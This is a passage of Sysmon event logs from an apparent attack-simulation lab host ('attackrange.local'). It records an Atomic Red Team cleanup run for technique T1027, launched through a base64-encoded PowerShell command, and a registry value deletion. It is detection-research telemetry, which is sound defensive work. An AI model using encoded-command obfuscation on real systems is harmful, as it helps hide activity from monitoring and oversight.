C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.427","ProcessGuid":"{A837DB8D-0330-5F25-0000-001044A90A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {Remove-ItemProperty -Force -ErrorAction Ignore -Path HKCU:Software\\Microsoft\\Windows\\CurrentVersion -Name Debug} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","ParentProcessId":"3088","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5558,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e334ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97eb5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e2c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e5037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e61366(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001044A90A00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33638(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e334ac(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97eb5cd8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e2c094(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e5037(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e61366(wow64)","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5559,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0330-5F25-0000-001044A90A00}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0330-5F25-0000-001044A90A00}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5560,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5561,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5562,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5563,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:48.422\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:48.422","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM